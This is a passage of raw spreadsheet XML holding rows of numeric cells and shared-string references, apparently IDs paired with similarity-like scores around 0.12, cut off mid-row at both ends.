      <c r="A30295" s="1">
        <v>27661.0</v>
      </c>
      <c r="B30295" s="2">
        <v>2.2906903E7</v>
      </c>
      <c r="C30295" s="2" t="s">
        <v>29126</v>
      </c>
      <c r="D30295" s="2">
        <v>1.0</v>
      </c>
      <c r="E30295" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30295" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="30296" ht="15.75" customHeight="1">
      <c r="A30296" s="1">
        <v>28010.0</v>
      </c>
      <c r="B30296" s="2">
        <v>2.4339884E7</v>
      </c>
      <c r="C30296" s="2" t="s">
        <v>29127</v>
      </c>
      <c r="D30296" s="2">
        <v>1.0</v>
      </c>
      <c r="E30296" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30296" s="2">
        <v>0.1244131455399062</v>
      </c>
    </row>
    <row r="30297" ht="15.75" customHeight="1">
      <c r="A30297" s="1">
        <v>30875.0</v>
      </c>
      <c r="B30297" s="2">
        <v>4.6306025E7</v>
      </c>
      <c r="C30297" s="2" t="s">
        <v>29128</v>
      </c>
      <c r="D30297" s="2">
        <v>1.0</v>
      </c>
      <c r="E30297" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30297" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="30298" ht="15.75" customHeight="1">
      <c r="A30298" s="1">
        <v>2649.0</v>
      </c>
      <c r="B30298" s="2">
        <v>3.4672251E7</v>
      </c>
      <c r="C30298" s="2" t="s">
        <v>29129</v>
      </c>
      <c r="D30298" s="2">
        <v>1.0</v>
      </c>
      <c r="E30298" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30298" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="30299" ht="15.75" customHeight="1">
      <c r="A30299" s="1">
        <v>3301.0</v>
      </c>
      <c r="B30299" s="2">
        <v>3.7584769E7</v>
      </c>
      <c r="C30299" s="2" t="s">
        <v>29130</v>
      </c>
      <c r="D30299" s="2">
        <v>1.0</v>
      </c>
      <c r="E30299" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30299" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="30300" ht="15.75" customHeight="1">
      <c r="A30300" s="1">
        <v>30586.0</v>
      </c>
      <c r="B30300" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C30300" s="2" t="s">
        <v>29131</v>
      </c>
      <c r="D30300" s="2">
        <v>1.0</v>
      </c>
      <c r="E30300" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30300" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="30301" ht="15.75" customHeight="1">
      <c r="A30301" s="1">
        <v>33250.0</v>
      </c>
      <c r="B30301" s="2">
        <v>7354346.0</v>
      </c>
      <c r="C30301" s="2" t="s">
        <v>29132</v>
      </c>
      <c r="D30301" s="2">
        <v>1.0</v>
      </c>
      <c r="E30301" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30301" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="30302" ht="15.75" customHeight="1">
      <c r="A30302" s="1">
        <v>11582.0</v>
      </c>
      <c r="B30302" s="2">
        <v>2.2833512E7</v>
      </c>
      <c r="C30302" s="2" t="s">
        <v>29133</v>
      </c>
      <c r="D30302" s="2">
        <v>1.0</v>
      </c>
      <c r="E30302" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30302" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="30303" ht="15.75" customHeight="1">
      <c r="A30303" s="1">
        <v>800.0</v>
      </c>
      <c r="B30303" s="2">
        <v>2.127892E7</v>
      </c>
      <c r="C30303" s="2" t="s">
        <v>29134</v>
      </c>
      <c r="D30303" s="2">
        <v>1.0</v>
      </c>
      <c r="E30303" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30303" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="30304" ht="15.75" customHeight="1">
      <c r="A30304" s="1">
        <v>5162.0</v>
      </c>
      <c r="B30304" s="2">
        <v>4.4750575E7</v>
      </c>
      <c r="C30304" s="2" t="s">
        <v>29135</v>
      </c>
      <c r="D30304" s="2">
        <v>1.0</v>
      </c>
      <c r="E30304" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30304" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="30305" ht="15.75" customHeight="1">
      <c r="A30305" s="1">
        <v>16970.0</v>
      </c>
      <c r="B30305" s="2">
        <v>4.8294578E7</v>
      </c>
      <c r="C30305" s="2" t="s">
        <v>29136</v>
      </c>
      <c r="D30305" s="2">
        <v>1.0</v>
      </c>
      <c r="E30305" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30305" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="30306" ht="15.75" customHeight="1">
      <c r="A30306" s="1">
        <v>6082.0</v>
      </c>
      <c r="B30306" s="2">
        <v>4.7680355E7</v>
      </c>
      <c r="C30306" s="2" t="s">
        <v>29137</v>
      </c>
      <c r="D30306" s="2">
        <v>1.0</v>
      </c>
      <c r="E30306" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30306" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="30307" ht="15.75" customHeight="1">
      <c r="A30307" s="1">
        <v>23313.0</v>
      </c>
      <c r="B30307" s="2">
        <v>5.4216632E7</v>
      </c>
      <c r="C30307" s="2" t="s">
        <v>29138</v>
      </c>
      <c r="D30307" s="2">
        <v>1.0</v>
      </c>
      <c r="E30307" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30307" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="30308" ht="15.75" customHeight="1">
      <c r="A30308" s="1">
        <v>27135.0</v>
      </c>
      <c r="B30308" s="2">
        <v>2.0766861E7</v>
      </c>
      <c r="C30308" s="2" t="s">
        <v>29139</v>
      </c>
      <c r="D30308" s="2">
        <v>1.0</v>
      </c>
      <c r="E30308" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30308" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="30309" ht="15.75" customHeight="1">
      <c r="A30309" s="1">
        <v>109.0</v>
      </c>
      <c r="B30309" s="2">
        <v>1.295882E7</v>
      </c>
      <c r="C30309" s="2" t="s">
        <v>29140</v>
      </c>
      <c r="D30309" s="2">
        <v>1.0</v>
      </c>
      <c r="E30309" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30309" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30310" ht="15.75" customHeight="1">
      <c r="A30310" s="1">
        <v>3428.0</v>
      </c>
      <c r="B30310" s="2">
        <v>3.8191619E7</v>
      </c>
      <c r="C30310" s="2" t="s">
        <v>29141</v>
      </c>
      <c r="D30310" s="2">
        <v>1.0</v>
      </c>
      <c r="E30310" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30310" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30311" ht="15.75" customHeight="1">
      <c r="A30311" s="1">
        <v>14715.0</v>
      </c>
      <c r="B30311" s="2">
        <v>4.0632083E7</v>
      </c>
      <c r="C30311" s="2" t="s">
        <v>29142</v>
      </c>
      <c r="D30311" s="2">
        <v>1.0</v>
      </c>
      <c r="E30311" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30311" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30312" ht="15.75" customHeight="1">
      <c r="A30312" s="1">
        <v>15236.0</v>
      </c>
      <c r="B30312" s="2">
        <v>4.2251383E7</v>
      </c>
      <c r="C30312" s="2" t="s">
        <v>29143</v>
      </c>
      <c r="D30312" s="2">
        <v>1.0</v>
      </c>
      <c r="E30312" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30312" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30313" ht="15.75" customHeight="1">
      <c r="A30313" s="1">
        <v>15545.0</v>
      </c>
      <c r="B30313" s="2">
        <v>4.3376929E7</v>
      </c>
      <c r="C30313" s="2" t="s">
        <v>29144</v>
      </c>
      <c r="D30313" s="2">
        <v>1.0</v>
      </c>
      <c r="E30313" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30313" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30314" ht="15.75" customHeight="1">
      <c r="A30314" s="1">
        <v>19980.0</v>
      </c>
      <c r="B30314" s="2">
        <v>5.760961E7</v>
      </c>
      <c r="C30314" s="2" t="s">
        <v>29145</v>
      </c>
      <c r="D30314" s="2">
        <v>1.0</v>
      </c>
      <c r="E30314" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30314" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30315" ht="15.75" customHeight="1">
      <c r="A30315" s="1">
        <v>20099.0</v>
      </c>
      <c r="B30315" s="2">
        <v>9714318.0</v>
      </c>
      <c r="C30315" s="2" t="s">
        <v>29146</v>
      </c>
      <c r="D30315" s="2">
        <v>1.0</v>
      </c>
      <c r="E30315" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30315" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30316" ht="15.75" customHeight="1">
      <c r="A30316" s="1">
        <v>21554.0</v>
      </c>
      <c r="B30316" s="2">
        <v>2.3601309E7</v>
      </c>
      <c r="C30316" s="2" t="s">
        <v>29102</v>
      </c>
      <c r="D30316" s="2">
        <v>1.0</v>
      </c>
      <c r="E30316" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30316" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30317" ht="15.75" customHeight="1">
      <c r="A30317" s="1">
        <v>22422.0</v>
      </c>
      <c r="B30317" s="2">
        <v>3.6106763E7</v>
      </c>
      <c r="C30317" s="2" t="s">
        <v>29147</v>
      </c>
      <c r="D30317" s="2">
        <v>1.0</v>
      </c>
      <c r="E30317" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30317" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30318" ht="15.75" customHeight="1">
      <c r="A30318" s="1">
        <v>24608.0</v>
      </c>
      <c r="B30318" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C30318" s="2" t="s">
        <v>29148</v>
      </c>
      <c r="D30318" s="2">
        <v>1.0</v>
      </c>
      <c r="E30318" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30318" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30319" ht="15.75" customHeight="1">
      <c r="A30319" s="1">
        <v>31298.0</v>
      </c>
      <c r="B30319" s="2">
        <v>4966443.0</v>
      </c>
      <c r="C30319" s="2" t="s">
        <v>29149</v>
      </c>
      <c r="D30319" s="2">
        <v>1.0</v>
      </c>
      <c r="E30319" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30319" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30320" ht="15.75" customHeight="1">
      <c r="A30320" s="1">
        <v>32771.0</v>
      </c>
      <c r="B30320" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C30320" s="2" t="s">
        <v>29150</v>
      </c>
      <c r="D30320" s="2">
        <v>1.0</v>
      </c>
      <c r="E30320" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30320" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="30321" ht="15.75" customHeight="1">
      <c r="A30321" s="1">
        <v>21463.0</v>
      </c>
      <c r="B30321" s="2">
        <v>2.2751796E7</v>
      </c>
      <c r="C30321" s="2" t="s">
        <v>29151</v>
      </c>
      <c r="D30321" s="2">
        <v>1.0</v>
      </c>
      <c r="E30321" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30321" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="30322" ht="15.75" customHeight="1">
      <c r="A30322" s="1">
        <v>24808.0</v>
      </c>
      <c r="B30322" s="2">
        <v>1.2038075E7</v>
      </c>
      <c r="C30322" s="2" t="s">
        <v>29152</v>
      </c>
      <c r="D30322" s="2">
        <v>1.0</v>
      </c>
      <c r="E30322" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30322" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="30323" ht="15.75" customHeight="1">
      <c r="A30323" s="1">
        <v>26920.0</v>
      </c>
      <c r="B30323" s="2">
        <v>1.9397036E7</v>
      </c>
      <c r="C30323" s="2" t="s">
        <v>29153</v>
      </c>
      <c r="D30323" s="2">
        <v>1.0</v>
      </c>
      <c r="E30323" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30323" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="30324" ht="15.75" customHeight="1">
      <c r="A30324" s="1">
        <v>27640.0</v>
      </c>
      <c r="B30324" s="2">
        <v>2.2751795E7</v>
      </c>
      <c r="C30324" s="2" t="s">
        <v>29151</v>
      </c>
      <c r="D30324" s="2">
        <v>1.0</v>
      </c>
      <c r="E30324" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30324" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="30325" ht="15.75" customHeight="1">
      <c r="A30325" s="1">
        <v>29781.0</v>
      </c>
      <c r="B30325" s="2">
        <v>3.5006535E7</v>
      </c>
      <c r="C30325" s="2" t="s">
        <v>29154</v>
      </c>
      <c r="D30325" s="2">
        <v>1.0</v>
      </c>
      <c r="E30325" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30325" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="30326" ht="15.75" customHeight="1">
      <c r="A30326" s="1">
        <v>690.0</v>
      </c>
      <c r="B30326" s="2">
        <v>2.0399826E7</v>
      </c>
      <c r="C30326" s="2" t="s">
        <v>29155</v>
      </c>
      <c r="D30326" s="2">
        <v>1.0</v>
      </c>
      <c r="E30326" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30326" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30327" ht="15.75" customHeight="1">
      <c r="A30327" s="1">
        <v>2351.0</v>
      </c>
      <c r="B30327" s="2">
        <v>3.3090669E7</v>
      </c>
      <c r="C30327" s="2" t="s">
        <v>29156</v>
      </c>
      <c r="D30327" s="2">
        <v>1.0</v>
      </c>
      <c r="E30327" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30327" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30328" ht="15.75" customHeight="1">
      <c r="A30328" s="1">
        <v>2768.0</v>
      </c>
      <c r="B30328" s="2">
        <v>3.511115E7</v>
      </c>
      <c r="C30328" s="2" t="s">
        <v>29157</v>
      </c>
      <c r="D30328" s="2">
        <v>1.0</v>
      </c>
      <c r="E30328" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30328" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30329" ht="15.75" customHeight="1">
      <c r="A30329" s="1">
        <v>2987.0</v>
      </c>
      <c r="B30329" s="2">
        <v>3.6216127E7</v>
      </c>
      <c r="C30329" s="2" t="s">
        <v>29158</v>
      </c>
      <c r="D30329" s="2">
        <v>1.0</v>
      </c>
      <c r="E30329" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30329" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30330" ht="15.75" customHeight="1">
      <c r="A30330" s="1">
        <v>4815.0</v>
      </c>
      <c r="B30330" s="2">
        <v>4.3600445E7</v>
      </c>
      <c r="C30330" s="2" t="s">
        <v>29159</v>
      </c>
      <c r="D30330" s="2">
        <v>1.0</v>
      </c>
      <c r="E30330" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30330" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30331" ht="15.75" customHeight="1">
      <c r="A30331" s="1">
        <v>5525.0</v>
      </c>
      <c r="B30331" s="2">
        <v>4.5876199E7</v>
      </c>
      <c r="C30331" s="2" t="s">
        <v>29160</v>
      </c>
      <c r="D30331" s="2">
        <v>1.0</v>
      </c>
      <c r="E30331" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30331" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30332" ht="15.75" customHeight="1">
      <c r="A30332" s="1">
        <v>5764.0</v>
      </c>
      <c r="B30332" s="2">
        <v>4.6684336E7</v>
      </c>
      <c r="C30332" s="2" t="s">
        <v>29161</v>
      </c>
      <c r="D30332" s="2">
        <v>1.0</v>
      </c>
      <c r="E30332" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30332" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30333" ht="15.75" customHeight="1">
      <c r="A30333" s="1">
        <v>7193.0</v>
      </c>
      <c r="B30333" s="2">
        <v>5.0576962E7</v>
      </c>
      <c r="C30333" s="2" t="s">
        <v>29162</v>
      </c>
      <c r="D30333" s="2">
        <v>1.0</v>
      </c>
      <c r="E30333" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30333" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30334" ht="15.75" customHeight="1">
      <c r="A30334" s="1">
        <v>8941.0</v>
      </c>
      <c r="B30334" s="2">
        <v>5.4892512E7</v>
      </c>
      <c r="C30334" s="2" t="s">
        <v>29163</v>
      </c>
      <c r="D30334" s="2">
        <v>1.0</v>
      </c>
      <c r="E30334" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30334" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30335" ht="15.75" customHeight="1">
      <c r="A30335" s="1">
        <v>10761.0</v>
      </c>
      <c r="B30335" s="2">
        <v>1.5591021E7</v>
      </c>
      <c r="C30335" s="2" t="s">
        <v>29164</v>
      </c>
      <c r="D30335" s="2">
        <v>1.0</v>
      </c>
      <c r="E30335" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30335" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30336" ht="15.75" customHeight="1">
      <c r="A30336" s="1">
        <v>11246.0</v>
      </c>
      <c r="B30336" s="2">
        <v>2.0478056E7</v>
      </c>
      <c r="C30336" s="2" t="s">
        <v>29165</v>
      </c>
      <c r="D30336" s="2">
        <v>1.0</v>
      </c>
      <c r="E30336" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30336" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30337" ht="15.75" customHeight="1">
      <c r="A30337" s="1">
        <v>11936.0</v>
      </c>
      <c r="B30337" s="2">
        <v>2.5500509E7</v>
      </c>
      <c r="C30337" s="2" t="s">
        <v>29166</v>
      </c>
      <c r="D30337" s="2">
        <v>1.0</v>
      </c>
      <c r="E30337" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30337" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30338" ht="15.75" customHeight="1">
      <c r="A30338" s="1">
        <v>11979.0</v>
      </c>
      <c r="B30338" s="2">
        <v>2.5829418E7</v>
      </c>
      <c r="C30338" s="2" t="s">
        <v>29167</v>
      </c>
      <c r="D30338" s="2">
        <v>1.0</v>
      </c>
      <c r="E30338" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30338" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30339" ht="15.75" customHeight="1">
      <c r="A30339" s="1">
        <v>12770.0</v>
      </c>
      <c r="B30339" s="2">
        <v>3.1259467E7</v>
      </c>
      <c r="C30339" s="2" t="s">
        <v>29168</v>
      </c>
      <c r="D30339" s="2">
        <v>1.0</v>
      </c>
      <c r="E30339" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30339" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30340" ht="15.75" customHeight="1">
      <c r="A30340" s="1">
        <v>12980.0</v>
      </c>
      <c r="B30340" s="2">
        <v>3.2677955E7</v>
      </c>
      <c r="C30340" s="2" t="s">
        <v>29169</v>
      </c>
      <c r="D30340" s="2">
        <v>1.0</v>
      </c>
      <c r="E30340" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30340" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30341" ht="15.75" customHeight="1">
      <c r="A30341" s="1">
        <v>13215.0</v>
      </c>
      <c r="B30341" s="2">
        <v>3.4196884E7</v>
      </c>
      <c r="C30341" s="2" t="s">
        <v>29170</v>
      </c>
      <c r="D30341" s="2">
        <v>1.0</v>
      </c>
      <c r="E30341" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30341" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30342" ht="15.75" customHeight="1">
      <c r="A30342" s="1">
        <v>13748.0</v>
      </c>
      <c r="B30342" s="2">
        <v>3.6482248E7</v>
      </c>
      <c r="C30342" s="2" t="s">
        <v>29171</v>
      </c>
      <c r="D30342" s="2">
        <v>1.0</v>
      </c>
      <c r="E30342" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30342" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30343" ht="15.75" customHeight="1">
      <c r="A30343" s="1">
        <v>15885.0</v>
      </c>
      <c r="B30343" s="2">
        <v>4.4533444E7</v>
      </c>
      <c r="C30343" s="2" t="s">
        <v>29172</v>
      </c>
      <c r="D30343" s="2">
        <v>1.0</v>
      </c>
      <c r="E30343" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30343" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30344" ht="15.75" customHeight="1">
      <c r="A30344" s="1">
        <v>16457.0</v>
      </c>
      <c r="B30344" s="2">
        <v>4.6452429E7</v>
      </c>
      <c r="C30344" s="2" t="s">
        <v>29173</v>
      </c>
      <c r="D30344" s="2">
        <v>1.0</v>
      </c>
      <c r="E30344" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30344" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30345" ht="15.75" customHeight="1">
      <c r="A30345" s="1">
        <v>17442.0</v>
      </c>
      <c r="B30345" s="2">
        <v>4.978552E7</v>
      </c>
      <c r="C30345" s="2" t="s">
        <v>29174</v>
      </c>
      <c r="D30345" s="2">
        <v>1.0</v>
      </c>
      <c r="E30345" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30345" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30346" ht="15.75" customHeight="1">
      <c r="A30346" s="1">
        <v>19454.0</v>
      </c>
      <c r="B30346" s="2">
        <v>5.5738164E7</v>
      </c>
      <c r="C30346" s="2" t="s">
        <v>29175</v>
      </c>
      <c r="D30346" s="2">
        <v>1.0</v>
      </c>
      <c r="E30346" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30346" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30347" ht="15.75" customHeight="1">
      <c r="A30347" s="1">
        <v>20107.0</v>
      </c>
      <c r="B30347" s="2">
        <v>9967042.0</v>
      </c>
      <c r="C30347" s="2" t="s">
        <v>29176</v>
      </c>
      <c r="D30347" s="2">
        <v>1.0</v>
      </c>
      <c r="E30347" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30347" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30348" ht="15.75" customHeight="1">
      <c r="A30348" s="1">
        <v>20962.0</v>
      </c>
      <c r="B30348" s="2">
        <v>1.6702649E7</v>
      </c>
      <c r="C30348" s="2" t="s">
        <v>29177</v>
      </c>
      <c r="D30348" s="2">
        <v>1.0</v>
      </c>
      <c r="E30348" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30348" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30349" ht="15.75" customHeight="1">
      <c r="A30349" s="1">
        <v>23229.0</v>
      </c>
      <c r="B30349" s="2">
        <v>5285795.0</v>
      </c>
      <c r="C30349" s="2" t="s">
        <v>29178</v>
      </c>
      <c r="D30349" s="2">
        <v>1.0</v>
      </c>
      <c r="E30349" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30349" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30350" ht="15.75" customHeight="1">
      <c r="A30350" s="1">
        <v>23616.0</v>
      </c>
      <c r="B30350" s="2">
        <v>6461704.0</v>
      </c>
      <c r="C30350" s="2" t="s">
        <v>29179</v>
      </c>
      <c r="D30350" s="2">
        <v>1.0</v>
      </c>
      <c r="E30350" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30350" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30351" ht="15.75" customHeight="1">
      <c r="A30351" s="1">
        <v>24001.0</v>
      </c>
      <c r="B30351" s="2">
        <v>9245451.0</v>
      </c>
      <c r="C30351" s="2" t="s">
        <v>29180</v>
      </c>
      <c r="D30351" s="2">
        <v>1.0</v>
      </c>
      <c r="E30351" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30351" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30352" ht="15.75" customHeight="1">
      <c r="A30352" s="1">
        <v>25534.0</v>
      </c>
      <c r="B30352" s="2">
        <v>1.4231686E7</v>
      </c>
      <c r="C30352" s="2" t="s">
        <v>29181</v>
      </c>
      <c r="D30352" s="2">
        <v>1.0</v>
      </c>
      <c r="E30352" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30352" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30353" ht="15.75" customHeight="1">
      <c r="A30353" s="1">
        <v>25599.0</v>
      </c>
      <c r="B30353" s="2">
        <v>1.4395079E7</v>
      </c>
      <c r="C30353" s="2" t="s">
        <v>29182</v>
      </c>
      <c r="D30353" s="2">
        <v>1.0</v>
      </c>
      <c r="E30353" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30353" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30354" ht="15.75" customHeight="1">
      <c r="A30354" s="1">
        <v>25601.0</v>
      </c>
      <c r="B30354" s="2">
        <v>1.4395079E7</v>
      </c>
      <c r="C30354" s="2" t="s">
        <v>29183</v>
      </c>
      <c r="D30354" s="2">
        <v>1.0</v>
      </c>
      <c r="E30354" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30354" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30355" ht="15.75" customHeight="1">
      <c r="A30355" s="1">
        <v>26716.0</v>
      </c>
      <c r="B30355" s="2">
        <v>1.8232683E7</v>
      </c>
      <c r="C30355" s="2" t="s">
        <v>29184</v>
      </c>
      <c r="D30355" s="2">
        <v>1.0</v>
      </c>
      <c r="E30355" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30355" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30356" ht="15.75" customHeight="1">
      <c r="A30356" s="1">
        <v>27225.0</v>
      </c>
      <c r="B30356" s="2">
        <v>2.098122E7</v>
      </c>
      <c r="C30356" s="2" t="s">
        <v>29185</v>
      </c>
      <c r="D30356" s="2">
        <v>1.0</v>
      </c>
      <c r="E30356" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30356" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30357" ht="15.75" customHeight="1">
      <c r="A30357" s="1">
        <v>28562.0</v>
      </c>
      <c r="B30357" s="2">
        <v>2.691081E7</v>
      </c>
      <c r="C30357" s="2" t="s">
        <v>29186</v>
      </c>
      <c r="D30357" s="2">
        <v>1.0</v>
      </c>
      <c r="E30357" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30357" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30358" ht="15.75" customHeight="1">
      <c r="A30358" s="1">
        <v>30717.0</v>
      </c>
      <c r="B30358" s="2">
        <v>4.32459E7</v>
      </c>
      <c r="C30358" s="2" t="s">
        <v>29187</v>
      </c>
      <c r="D30358" s="2">
        <v>1.0</v>
      </c>
      <c r="E30358" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30358" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30359" ht="15.75" customHeight="1">
      <c r="A30359" s="1">
        <v>31448.0</v>
      </c>
      <c r="B30359" s="2">
        <v>5031148.0</v>
      </c>
      <c r="C30359" s="2" t="s">
        <v>29188</v>
      </c>
      <c r="D30359" s="2">
        <v>1.0</v>
      </c>
      <c r="E30359" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30359" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30360" ht="15.75" customHeight="1">
      <c r="A30360" s="1">
        <v>33683.0</v>
      </c>
      <c r="B30360" s="2">
        <v>8434282.0</v>
      </c>
      <c r="C30360" s="2" t="s">
        <v>29189</v>
      </c>
      <c r="D30360" s="2">
        <v>1.0</v>
      </c>
      <c r="E30360" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30360" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30361" ht="15.75" customHeight="1">
      <c r="A30361" s="1">
        <v>34228.0</v>
      </c>
      <c r="B30361" s="2">
        <v>4729636.0</v>
      </c>
      <c r="C30361" s="2" t="s">
        <v>29190</v>
      </c>
      <c r="D30361" s="2">
        <v>1.0</v>
      </c>
      <c r="E30361" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30361" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="30362" ht="15.75" customHeight="1">
      <c r="A30362" s="1">
        <v>8343.0</v>
